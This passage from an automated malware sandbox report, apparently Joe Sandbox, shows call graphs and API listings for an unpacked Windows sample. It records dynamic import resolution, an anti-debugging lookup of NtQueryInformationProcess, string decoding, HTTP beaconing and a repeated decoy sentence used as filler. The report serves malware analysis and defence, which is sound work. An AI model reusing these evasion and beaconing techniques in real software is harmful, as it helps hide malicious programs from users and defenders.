37183->37184 37185 d33aa5 37184->37185 37186 d34610 2 API calls 37185->37186 37187 d33abe 37186->37187 37188 d34610 2 API calls 37187->37188 37189 d33ad7 37188->37189 37190 d34610 2 API calls 37189->37190 37191 d33af0 37190->37191 37192 d34610 2 API calls 37191->37192 37193 d33b09 37192->37193 37194 d34610 2 API calls 37193->37194 37195 d33b22 37194->37195 37196 d34610 2 API calls 37195->37196 37197 d33b3b 37196->37197 37198 d34610 2 API calls 37197->37198 37199 d33b54 37198->37199 37200 d34610 2 API calls 37199->37200 37201 d33b6d 37200->37201 37202 d34610 2 API calls 37201->37202 37203 d33b86 37202->37203 37204 d34610 2 API calls 37203->37204 37205 d33b9f 37204->37205 37206 d34610 2 API calls 37205->37206 37207 d33bb8 37206->37207 37208 d34610 2 API calls 37207->37208 37209 d33bd1 37208->37209 37210 d34610 2 API calls 37209->37210 37211 d33bea 37210->37211 37212 d34610 2 API calls 37211->37212 37213 d33c03 37212->37213 37214 d34610 2 API calls 37213->37214 37215 d33c1c 37214->37215 37216 d34610 2 API calls 37215->37216 37217 d33c35 37216->37217 37218 d34610 2 API calls 37217->37218 37219 d33c4e 37218->37219 37220 d34610 2 API calls 37219->37220 37221 d33c67 37220->37221 37222 d34610 2 API calls 37221->37222 37223 d33c80 37222->37223 37224 d34610 2 API calls 37223->37224 37225 d33c99 37224->37225 37226 d34610 2 API calls 37225->37226 37227 d33cb2 37226->37227 37228 d34610 2 API calls 37227->37228 37229 d33ccb 37228->37229 37230 d34610 2 API calls 37229->37230 37231 d33ce4 37230->37231 37232 d34610 2 API calls 37231->37232 37233 d33cfd 37232->37233 37234 d34610 2 API calls 37233->37234 37235 d33d16 37234->37235 37236 d34610 2 API calls 37235->37236 37237 d33d2f 37236->37237 37238 d34610 2 API calls 37237->37238 37239 d33d48 37238->37239 37240 d34610 2 API calls 37239->37240 37241 d33d61 37240->37241 37242 d34610 2 API calls 37241->37242 37243 d33d7a 37242->37243 37244 d34610 2 API calls 37243->37244 37245 d33d93 37244->37245 37246 d34610 2 API calls 37245->37246 
37247 d33dac 37246->37247 37248 d34610 2 API calls 37247->37248 37249 d33dc5 37248->37249 37250 d34610 2 API calls 37249->37250 37251 d33dde 37250->37251 37252 d34610 2 API calls 37251->37252 37253 d33df7 37252->37253 37254 d34610 2 API calls 37253->37254 37255 d33e10 37254->37255 37256 d34610 2 API calls 37255->37256 37257 d33e29 37256->37257 37258 d34610 2 API calls 37257->37258 37259 d33e42 37258->37259 37260 d34610 2 API calls 37259->37260 37261 d33e5b 37260->37261 37262 d34610 2 API calls 37261->37262 37263 d33e74 37262->37263 37264 d34610 2 API calls 37263->37264 37265 d33e8d 37264->37265 37266 d34610 2 API calls 37265->37266 37267 d33ea6 37266->37267 37268 d34610 2 API calls 37267->37268 37269 d33ebf 37268->37269 37270 d34610 2 API calls 37269->37270 37271 d33ed8 37270->37271 37272 d34610 2 API calls 37271->37272 37273 d33ef1 37272->37273 37274 d34610 2 API calls 37273->37274 37275 d33f0a 37274->37275 37276 d34610 2 API calls 37275->37276 37277 d33f23 37276->37277 37278 d34610 2 API calls 37277->37278 37279 d33f3c 37278->37279 37280 d34610 2 API calls 37279->37280 37281 d33f55 37280->37281 37282 d34610 2 API calls 37281->37282 37283 d33f6e 37282->37283 37284 d34610 2 API calls 37283->37284 37285 d33f87 37284->37285 37286 d34610 2 API calls 37285->37286 37287 d33fa0 37286->37287 37288 d34610 2 API calls 37287->37288 37289 d33fb9 37288->37289 37290 d34610 2 API calls 37289->37290 37291 d33fd2 37290->37291 37292 d34610 2 API calls 37291->37292 37293 d33feb 37292->37293 37294 d34610 2 API calls 37293->37294 37295 d34004 37294->37295 37296 d34610 2 API calls 37295->37296 37297 d3401d 37296->37297 37298 d34610 2 API calls 37297->37298 37299 d34036 37298->37299 37300 d34610 2 API calls 37299->37300 37301 d3404f 37300->37301 37302 d34610 2 API calls 37301->37302 37303 d34068 37302->37303 37304 d34610 2 API calls 37303->37304 37305 d34081 37304->37305 37306 d34610 2 API calls 37305->37306 37307 d3409a 37306->37307 37308 d34610 2 API calls 37307->37308 37309 d340b3 
37308->37309 37310 d34610 2 API calls 37309->37310 37311 d340cc 37310->37311 37312 d34610 2 API calls 37311->37312 37313 d340e5 37312->37313 37314 d34610 2 API calls 37313->37314 37315 d340fe 37314->37315 37316 d34610 2 API calls 37315->37316 37317 d34117 37316->37317 37318 d34610 2 API calls 37317->37318 37319 d34130 37318->37319 37320 d34610 2 API calls 37319->37320 37321 d34149 37320->37321 37322 d34610 2 API calls 37321->37322 37323 d34162 37322->37323 37324 d34610 2 API calls 37323->37324 37325 d3417b 37324->37325 37326 d34610 2 API calls 37325->37326 37327 d34194 37326->37327 37328 d34610 2 API calls 37327->37328 37329 d341ad 37328->37329 37330 d34610 2 API calls 37329->37330 37331 d341c6 37330->37331 37332 d34610 2 API calls 37331->37332 37333 d341df 37332->37333 37334 d34610 2 API calls 37333->37334 37335 d341f8 37334->37335 37336 d34610 2 API calls 37335->37336 37337 d34211 37336->37337 37338 d34610 2 API calls 37337->37338 37339 d3422a 37338->37339 37340 d34610 2 API calls 37339->37340 37341 d34243 37340->37341 37342 d34610 2 API calls 37341->37342 37343 d3425c 37342->37343 37344 d34610 2 API calls 37343->37344 37345 d34275 37344->37345 37346 d34610 2 API calls 37345->37346 37347 d3428e 37346->37347 37348 d34610 2 API calls 37347->37348 37349 d342a7 37348->37349 37350 d34610 2 API calls 37349->37350 37351 d342c0 37350->37351 37352 d34610 2 API calls 37351->37352 37353 d342d9 37352->37353 37354 d34610 2 API calls 37353->37354 37355 d342f2 37354->37355 37356 d34610 2 API calls 37355->37356 37357 d3430b 37356->37357 37358 d34610 2 API calls 37357->37358 37359 d34324 37358->37359 37360 d34610 2 API calls 37359->37360 37361 d3433d 37360->37361 37362 d34610 2 API calls 37361->37362 37363 d34356 37362->37363 37364 d34610 2 API calls 37363->37364 37365 d3436f 37364->37365 37366 d34610 2 API calls 37365->37366 37367 d34388 37366->37367 37368 d34610 2 API calls 37367->37368 37369 d343a1 37368->37369 37370 d34610 2 API calls 37369->37370 37371 d343ba 37370->37371 
37372 d34610 2 API calls 37371->37372 37373 d343d3 37372->37373 37374 d34610 2 API calls 37373->37374 37375 d343ec 37374->37375 37376 d34610 2 API calls 37375->37376 37377 d34405 37376->37377 37378 d34610 2 API calls 37377->37378 37379 d3441e 37378->37379 37380 d34610 2 API calls 37379->37380 37381 d34437 37380->37381 37382 d34610 2 API calls 37381->37382 37383 d34450 37382->37383 37384 d34610 2 API calls 37383->37384 37385 d34469 37384->37385 37386 d34610 2 API calls 37385->37386 37387 d34482 37386->37387 37388 d34610 2 API calls 37387->37388 37389 d3449b 37388->37389 37390 d34610 2 API calls 37389->37390 37391 d344b4 37390->37391 37392 d34610 2 API calls 37391->37392 37393 d344cd 37392->37393 37394 d34610 2 API calls 37393->37394 37395 d344e6 37394->37395 37396 d34610 2 API calls 37395->37396 37397 d344ff 37396->37397 37398 d34610 2 API calls 37397->37398 37399 d34518 37398->37399 37400 d34610 2 API calls 37399->37400 37401 d34531 37400->37401 37402 d34610 2 API calls 37401->37402 37403 d3454a 37402->37403 37404 d34610 2 API calls 37403->37404 37405 d34563 37404->37405 37406 d34610 2 API calls 37405->37406 37407 d3457c 37406->37407 37408 d34610 2 API calls 37407->37408 37409 d34595 37408->37409 37410 d34610 2 API calls 37409->37410 37411 d345ae 37410->37411 37412 d34610 2 API calls 37411->37412 37413 d345c7 37412->37413 37414 d34610 2 API calls 37413->37414 37415 d345e0 37414->37415 37416 d34610 2 API calls 37415->37416 37417 d345f9 37416->37417 37418 d49f20 37417->37418 37419 d4a346 8 API calls 37418->37419 37420 d49f30 43 API calls 37418->37420 37421 d4a456 37419->37421 37422 d4a3dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37419->37422 37420->37419 37423 d4a526 37421->37423 37424 d4a463 8 API calls 37421->37424 37422->37421 37425 d4a52f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37423->37425 37426 d4a5a8 37423->37426 37424->37423 37425->37426 37427 d4a5b5 6 API calls 37426->37427 37428 d4a647 
37426->37428 37427->37428 37429 d4a654 9 API calls 37428->37429 37430 d4a72f 37428->37430 37429->37430 37431 d4a7b2 37430->37431 37432 d4a738 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37430->37432 37433 d4a7ec 37431->37433 37434 d4a7bb GetProcAddress GetProcAddress 37431->37434 37432->37431 37435 d4a825 37433->37435 37436 d4a7f5 GetProcAddress GetProcAddress 37433->37436 37434->37433 37437 d4a922 37435->37437 37438 d4a832 10 API calls 37435->37438 37436->37435 37439 d4a98d 37437->37439 37440 d4a92b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37437->37440 37438->37437 37441 d4a996 GetProcAddress 37439->37441 37442 d4a9ae 37439->37442 37440->37439 37441->37442 37443 d4a9b7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37442->37443 37444 d45ef3 37442->37444 37443->37444 37445 d31590 37444->37445 37715 d316b0 37445->37715 37448 d4aab0 lstrcpy 37449 d315b5 37448->37449 37450 d4aab0 lstrcpy 37449->37450 37451 d315c7 37450->37451 37452 d4aab0 lstrcpy 37451->37452 37453 d315d9 37452->37453 37454 d4aab0 lstrcpy 37453->37454 37455 d31663 37454->37455 37456 d45760 37455->37456 37457 d45771 37456->37457 37458 d4ab30 2 API calls 37457->37458 37459 d4577e 37458->37459 37460 d4ab30 2 API calls 37459->37460 37461 d4578b 37460->37461 37462 d4ab30 2 API calls 37461->37462 37463 d45798 37462->37463 37464 d4aa50 lstrcpy 37463->37464 37465 d457a5 37464->37465 37466 d4aa50 lstrcpy 37465->37466 37467 d457b2 37466->37467 37468 d4aa50 lstrcpy 37467->37468 37469 d457bf 37468->37469 37470 d4aa50 lstrcpy 37469->37470 37509 d457cc 37470->37509 37471 d31590 lstrcpy 37471->37509 37472 d45893 StrCmpCA 37472->37509 37473 d458f0 StrCmpCA 37474 d45a2c 37473->37474 37473->37509 37475 d4abb0 lstrcpy 37474->37475 37476 d45a38 37475->37476 37477 d4ab30 2 API calls 37476->37477 37479 d45a46 37477->37479 37478 d45aa6 StrCmpCA 37481 d45be1 37478->37481 37478->37509 37480 d4ab30 2 API calls 37479->37480 37483 d45a55 37480->37483 37484 d4abb0 
lstrcpy 37481->37484 37482 d4aab0 lstrcpy 37482->37509 37485 d316b0 lstrcpy 37483->37485 37486 d45bed 37484->37486 37506 d45a61 37485->37506 37489 d4ab30 2 API calls 37486->37489 37487 d4aa50 lstrcpy 37487->37509 37488 d4ab30 lstrlen lstrcpy 37488->37509 37490 d45bfb 37489->37490 37492 d4ab30 2 API calls 37490->37492 37491 d45c5b StrCmpCA 37493 d45c66 Sleep 37491->37493 37494 d45c78 37491->37494 37495 d45c0a 37492->37495 37493->37509 37496 d4abb0 lstrcpy 37494->37496 37497 d316b0 lstrcpy 37495->37497 37498 d45c84 37496->37498 37497->37506 37499 d4ab30 2 API calls 37498->37499 37500 d45c93 37499->37500 37502 d4ab30 2 API calls 37500->37502 37501 d45510 25 API calls 37501->37509 37503 d45ca2 37502->37503 37505 d316b0 lstrcpy 37503->37505 37504 d459da StrCmpCA 37504->37509 37505->37506 37506->36563 37507 d45b8f StrCmpCA 37507->37509 37508 d45440 20 API calls 37508->37509 37509->37471 37509->37472 37509->37473 37509->37478 37509->37482 37509->37487 37509->37488 37509->37491 37509->37501 37509->37504 37509->37507 37509->37508 37510 d4abb0 lstrcpy 37509->37510 37510->37509 37512 d476e3 GetVolumeInformationA 37511->37512 37513 d476dc 37511->37513 37514 d47721 37512->37514 37513->37512 37515 d4778c GetProcessHeap RtlAllocateHeap 37514->37515 37516 d477b8 wsprintfA 37515->37516 37517 d477a9 37515->37517 37519 d4aa50 lstrcpy 37516->37519 37518 d4aa50 lstrcpy 37517->37518 37520 d45ff7 37518->37520 37519->37520 37520->36584 37522 d4aab0 lstrcpy 37521->37522 37523 d348e9 37522->37523 37724 d34800 37523->37724 37525 d348f5 37526 d4aa50 lstrcpy 37525->37526 37527 d34927 37526->37527 37528 d4aa50 lstrcpy 37527->37528 37529 d34934 37528->37529 37530 d4aa50 lstrcpy 37529->37530 37531 d34941 37530->37531 37532 d4aa50 lstrcpy 37531->37532 37533 d3494e 37532->37533 37534 d4aa50 lstrcpy 37533->37534 37535 d3495b InternetOpenA StrCmpCA 37534->37535 37536 d34994 37535->37536 37537 d34f1b InternetCloseHandle 37536->37537 37730 d48cf0 37536->37730 37539 d34f38 37537->37539 37745 d3a210 
CryptStringToBinaryA 37539->37745 37540 d349b3 37738 d4ac30 37540->37738 37543 d349c6 37545 d4abb0 lstrcpy 37543->37545 37550 d349cf 37545->37550 37546 d4ab30 2 API calls 37547 d34f55 37546->37547 37549 d4acc0 4 API calls 37547->37549 37548 d34f77 codecvt 37552 d4aab0 lstrcpy 37548->37552 37551 d34f6b 37549->37551 37554 d4acc0 4 API calls 37550->37554 37553 d4abb0 lstrcpy 37551->37553 37565 d34fa7 37552->37565 37553->37548 37555 d349f9 37554->37555 37556 d4abb0 lstrcpy 37555->37556 37557 d34a02 37556->37557 37558 d4acc0 4 API calls 37557->37558 37559 d34a21 37558->37559 37560 d4abb0 lstrcpy 37559->37560 37561 d34a2a 37560->37561 37562 d4ac30 3 API calls 37561->37562 37563 d34a48 37562->37563 37564 d4abb0 lstrcpy 37563->37564 37566 d34a51 37564->37566 37565->36587 37567 d4acc0 4 API calls 37566->37567 37568 d34a70 37567->37568 37569 d4abb0 lstrcpy 37568->37569 37570 d34a79 37569->37570 37571 d4acc0 4 API calls 37570->37571 37572 d34a98 37571->37572 37573 d4abb0 lstrcpy 37572->37573 37574 d34aa1 37573->37574 37575 d4acc0 4 API calls 37574->37575 37576 d34acd 37575->37576 37577 d4ac30 3 API calls 37576->37577 37578 d34ad4 37577->37578 37579 d4abb0 lstrcpy 37578->37579 37580 d34add 37579->37580 37581 d34af3 InternetConnectA 37580->37581 37581->37537 37582 d34b23 HttpOpenRequestA 37581->37582 37584 d34b78 37582->37584 37585 d34f0e InternetCloseHandle 37582->37585 37586 d4acc0 4 API calls 37584->37586 37585->37537 37587 d34b8c 37586->37587 37588 d4abb0 lstrcpy 37587->37588 37589 d34b95 37588->37589 37590 d4ac30 3 API calls 37589->37590 37591 d34bb3 37590->37591 37592 d4abb0 lstrcpy 37591->37592 37593 d34bbc 37592->37593 37594 d4acc0 4 API calls 37593->37594 37595 d34bdb 37594->37595 37596 d4abb0 lstrcpy 37595->37596 37597 d34be4 37596->37597 37598 d4acc0 4 API calls 37597->37598 37599 d34c05 37598->37599 37600 d4abb0 lstrcpy 37599->37600 37601 d34c0e 37600->37601 37602 d4acc0 4 API calls 37601->37602 37603 d34c2e 37602->37603 37604 d4abb0 lstrcpy 37603->37604 37605 
d34c37 37604->37605 37606 d4acc0 4 API calls 37605->37606 37607 d34c56 37606->37607 37608 d4abb0 lstrcpy 37607->37608 37609 d34c5f 37608->37609 37610 d4ac30 3 API calls 37609->37610 37611 d34c7d 37610->37611 37612 d4abb0 lstrcpy 37611->37612 37613 d34c86 37612->37613 37614 d4acc0 4 API calls 37613->37614 37615 d34ca5 37614->37615 37616 d4abb0 lstrcpy 37615->37616 37617 d34cae 37616->37617 37618 d4acc0 4 API calls 37617->37618 37619 d34ccd 37618->37619 37620 d4abb0 lstrcpy 37619->37620 37621 d34cd6 37620->37621 37622 d4ac30 3 API calls 37621->37622 37623 d34cf4 37622->37623 37624 d4abb0 lstrcpy 37623->37624 37625 d34cfd 37624->37625 37626 d4acc0 4 API calls 37625->37626 37627 d34d1c 37626->37627 37628 d4abb0 lstrcpy 37627->37628 37629 d34d25 37628->37629 37630 d4acc0 4 API calls 37629->37630 37631 d34d46 37630->37631 37632 d4abb0 lstrcpy 37631->37632 37633 d34d4f 37632->37633 37634 d4acc0 4 API calls 37633->37634 37635 d34d6f 37634->37635 37636 d4abb0 lstrcpy 37635->37636 37637 d34d78 37636->37637 37638 d4acc0 4 API calls 37637->37638 37639 d34d97 37638->37639 37640 d4abb0 lstrcpy 37639->37640 37641 d34da0 37640->37641 37642 d4ac30 3 API calls 37641->37642 37643 d34dbe 37642->37643 37644 d4abb0 lstrcpy 37643->37644 37645 d34dc7 37644->37645 37646 d4aa50 lstrcpy 37645->37646 37647 d34de2 37646->37647 37648 d4ac30 3 API calls 37647->37648 37649 d34e03 37648->37649 37650 d4ac30 3 API calls 37649->37650 37651 d34e0a 37650->37651 37652 d4abb0 lstrcpy 37651->37652 37653 d34e16 37652->37653 37654 d34e37 lstrlen 37653->37654 37655 d34e4a 37654->37655 37656 d34e53 lstrlen 37655->37656 37744 d4ade0 37656->37744 37658 d34e63 HttpSendRequestA 37659 d34e82 InternetReadFile 37658->37659 37660 d34eb7 InternetCloseHandle 37659->37660 37665 d34eae 37659->37665 37662 d4ab10 37660->37662 37662->37585 37663 d4acc0 4 API calls 37663->37665 37664 d4abb0 lstrcpy 37664->37665 37665->37659 37665->37660 37665->37663 37665->37664 37751 d4ade0 37666->37751 37668 d41a14 StrCmpCA 37669 d41a27 
37668->37669 37670 d41a1f ExitProcess 37668->37670 37671 d41c12 37669->37671 37672 d41afd StrCmpCA 37669->37672 37673 d41b1f StrCmpCA 37669->37673 37674 d41bc0 StrCmpCA 37669->37674 37675 d41b41 StrCmpCA 37669->37675 37676 d41ba1 StrCmpCA 37669->37676 37677 d41b82 StrCmpCA 37669->37677 37678 d41b63 StrCmpCA 37669->37678 37679 d41aad StrCmpCA 37669->37679 37680 d41acf StrCmpCA 37669->37680 37681 d4ab30 lstrlen lstrcpy 37669->37681 37671->36589 37672->37669 37673->37669 37674->37669 37675->37669 37676->37669 37677->37669 37678->37669 37679->37669 37680->37669 37681->37669 37682->36595 37683->36597 37684->36603 37685->36605 37686->36611 37687->36613 37688->36617 37689->36621 37690->36625 37691->36631 37692->36633 37693->36637 37694->36651 37695->36655 37696->36654 37697->36650 37698->36654 37699->36673 37700->36657 37701->36659 37702->36663 37703->36668 37704->36670 37705->36676 37706->36679 37707->36686 37708->36708 37709->36712 37710->36711 37711->36707 37712->36711 37713->36721 37716 d4aab0 lstrcpy 37715->37716 37717 d316c3 37716->37717 37718 d4aab0 lstrcpy 37717->37718 37719 d316d5 37718->37719 37720 d4aab0 lstrcpy 37719->37720 37721 d316e7 37720->37721 37722 d4aab0 lstrcpy 37721->37722 37723 d315a3 37722->37723 37723->37448 37725 d34816 37724->37725 37726 d34888 lstrlen 37725->37726 37750 d4ade0 37726->37750 37728 d34898 InternetCrackUrlA 37729 d348b7 37728->37729 37729->37525 37731 d4aa50 lstrcpy 37730->37731 37732 d48d04 37731->37732 37733 d4aa50 lstrcpy 37732->37733 37734 d48d12 GetSystemTime 37733->37734 37735 d48d29 37734->37735 37736 d4aab0 lstrcpy 37735->37736 37737 d48d8c 37736->37737 37737->37540 37739 d4ac41 37738->37739 37740 d4ac98 37739->37740 37742 d4ac78 lstrcpy lstrcat 37739->37742 37741 d4aab0 lstrcpy 37740->37741 37743 d4aca4 37741->37743 37742->37740 37743->37543 37744->37658 37746 d34f3e 37745->37746 37747 d3a249 LocalAlloc 37745->37747 37746->37546 37746->37548 37747->37746 37748 d3a264 CryptStringToBinaryA 37747->37748 37748->37746 37749 
d3a289 LocalFree 37748->37749 37749->37746 37750->37728 37751->37668

                                      Control-flow Graph

                                      APIs
                                      • GetProcAddress.KERNEL32(74DD0000,01672218), ref: 00D49BF1
                                      • GetProcAddress.KERNEL32(74DD0000,01672368), ref: 00D49C0A
                                      • GetProcAddress.KERNEL32(74DD0000,016723F8), ref: 00D49C22
                                      • GetProcAddress.KERNEL32(74DD0000,016723C8), ref: 00D49C3A
                                      • GetProcAddress.KERNEL32(74DD0000,016723E0), ref: 00D49C53
                                      • GetProcAddress.KERNEL32(74DD0000,016791C8), ref: 00D49C6B
                                      • GetProcAddress.KERNEL32(74DD0000,01665890), ref: 00D49C83
                                      • GetProcAddress.KERNEL32(74DD0000,01665790), ref: 00D49C9C
                                      • GetProcAddress.KERNEL32(74DD0000,016722D8), ref: 00D49CB4
                                      • GetProcAddress.KERNEL32(74DD0000,01672440), ref: 00D49CCC
                                      • GetProcAddress.KERNEL32(74DD0000,01672470), ref: 00D49CE5
                                      • GetProcAddress.KERNEL32(74DD0000,01672338), ref: 00D49CFD
                                      • GetProcAddress.KERNEL32(74DD0000,016656B0), ref: 00D49D15
                                      • GetProcAddress.KERNEL32(74DD0000,01672230), ref: 00D49D2E
                                      • GetProcAddress.KERNEL32(74DD0000,01672248), ref: 00D49D46
                                      • GetProcAddress.KERNEL32(74DD0000,01665950), ref: 00D49D5E
                                      • GetProcAddress.KERNEL32(74DD0000,01672260), ref: 00D49D77
                                      • GetProcAddress.KERNEL32(74DD0000,01672290), ref: 00D49D8F
                                      • GetProcAddress.KERNEL32(74DD0000,016657F0), ref: 00D49DA7
                                      • GetProcAddress.KERNEL32(74DD0000,016722A8), ref: 00D49DC0
                                      • GetProcAddress.KERNEL32(74DD0000,01665910), ref: 00D49DD8
                                      • LoadLibraryA.KERNEL32(01672578,?,00D46CA0), ref: 00D49DEA
                                      • LoadLibraryA.KERNEL32(01672518,?,00D46CA0), ref: 00D49DFB
                                      • LoadLibraryA.KERNEL32(01672530,?,00D46CA0), ref: 00D49E0D
                                      • LoadLibraryA.KERNEL32(01672590,?,00D46CA0), ref: 00D49E1F
                                      • LoadLibraryA.KERNEL32(01672548,?,00D46CA0), ref: 00D49E30
                                      • GetProcAddress.KERNEL32(75A70000,016725A8), ref: 00D49E52
                                      • GetProcAddress.KERNEL32(75290000,016725C0), ref: 00D49E73
                                      • GetProcAddress.KERNEL32(75290000,016725D8), ref: 00D49E8B
                                      • GetProcAddress.KERNEL32(75BD0000,01672560), ref: 00D49EAD
                                      • GetProcAddress.KERNEL32(75450000,016657B0), ref: 00D49ECE
                                      • GetProcAddress.KERNEL32(76E90000,01679178), ref: 00D49EEF
                                      • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00D49F06
                                      Strings
                                      • NtQueryInformationProcess, xrefs: 00D49EFA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID: NtQueryInformationProcess
                                      • API String ID: 2238633743-2781105232
                                      • Opcode ID: 41aff88a6d72b5f4d66724fffce69c951c30601a713e4854ccab41ec01ac90cb
                                      • Instruction ID: 38c5c7e266c895d80200b1628adb712535aa6ebe5f28b52dc9c1e41c9f24e335
                                      • Opcode Fuzzy Hash: 41aff88a6d72b5f4d66724fffce69c951c30601a713e4854ccab41ec01ac90cb
                                      • Instruction Fuzzy Hash: E8A122B5500240DFC366DFA9E89899677BAA74D701F10861AB9C9C3298D73FB950CFB0

                                      Control-flow Graph (rendered as a figure in the original, with executed and not-executed blocks colour-coded; block structure recovered from the graph data:)
                                      • d34610-d346e5 (RtlAllocateHeap) -> d346f0-d346f6
                                      • d346f0-d346f6 -> d346fc-d3479a, which loops back to d346f0, or -> d3479f-d347f9 (VirtualProtect)
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00D3465E
                                      • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00D347EC
                                      Strings
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D347C0, 00D346B2, 00D3476E, 00D34622, 00D347B5, 00D346D3, 00D34693, 00D346A7, 00D347CB, 00D34688, 00D3471D, 00D34672, 00D3467D, 00D34712, 00D34667, 00D3479F, 00D34779, 00D34707, 00D34617, 00D346C8, 00D3462D, 00D346BD, 00D34638, 00D34784, 00D34763, 00D34728, 00D347AA, 00D3478F, 00D34643, 00D346FC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeapProtectVirtual
                                      • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (the same sentence repeated once per xref listed above, joined with $)
                                      • API String ID: 1542196881-2218711628
                                      • Opcode ID: 90f562a4c8f0bafb1e15398973944ed5c9fdd86e39f1495f7419d616b5ab9cb5
                                      • Instruction ID: 8c7c6a08b50dbec788d338e4285b23facde6a9a1316dadf5567027f4b6282289
                                      • Opcode Fuzzy Hash: 90f562a4c8f0bafb1e15398973944ed5c9fdd86e39f1495f7419d616b5ab9cb5
                                      • Instruction Fuzzy Hash: 7F412D686C3615EFCB39BBA8BC52FDD76635F53782F40504CBF2812284CAB0650C49BA

                                      Control-flow Graph (rendered as a figure in the original, with executed and not-executed blocks colour-coded; block structure recovered from the graph data:)
                                      • d362d0-d3635b (call d4aab0, call d34800, call d4aa50, InternetOpenA, StrCmpCA) -> d36364-d36368, directly or via d3635d
                                      • d36364-d36368 -> d3636e-d36392 (InternetConnectA), or -> d36559-d36575 (call d4aab0, call d4ab10 x2) -> d36578-d3657d (exit)
                                      • d3636e-d36392 -> d36398-d3639c -> d3639e-d363a8 or d363aa -> d363b4-d363e2 (HttpOpenRequestA); the other branch -> d3654f-d36553 (InternetCloseHandle) -> d36559
                                      • d363b4-d363e2 -> d363e8-d363ec -> optionally d363ee-d3640f (InternetSetOptionA) -> d36415-d36455 (HttpSendRequestA, HttpQueryInfoA); the other branch -> d36545-d36549 (InternetCloseHandle) -> d3654f
                                      • d36415-d36455 -> d3647c-d3649b (call d48ad0) -> d3649d-d364a4, or -> d36457-d36477 (call d4aa50, call d4ab10 x2) -> exit; d3647c-d3649b can also -> d36519-d36539 (call d4aa50, call d4ab10 x2) -> exit
                                      • d3649d-d364a4 -> read loop d364a6-d364d0 (InternetReadFile) -> d364d2-d364d9 -> d364dd-d36515 (call d4acc0, call d4abb0, call d4ab10) -> back to d364a6; the loop leaves via d364db -> d36517-d3653f (InternetCloseHandle) -> d36545 -> d3654f -> d36559 -> exit
                                      APIs
                                        • Part of subcall function 00D4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00D4AAF6
                                        • Part of subcall function 00D34800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00D34889
                                        • Part of subcall function 00D34800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00D34899
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                      • InternetOpenA.WININET(00D50DFF,00000001,00000000,00000000,00000000), ref: 00D36331
                                      • StrCmpCA.SHLWAPI(?,0167E7D8), ref: 00D36353
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D36385
                                      • HttpOpenRequestA.WININET(00000000,GET,?,0167E3F8,00000000,00000000,00400100,00000000), ref: 00D363D5
                                      • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00D3640F
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00D36421
                                      • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00D3644D
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00D364BD
                                      • InternetCloseHandle.WININET(00000000), ref: 00D3653F
                                      • InternetCloseHandle.WININET(00000000), ref: 00D36549
                                      • InternetCloseHandle.WININET(00000000), ref: 00D36553
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
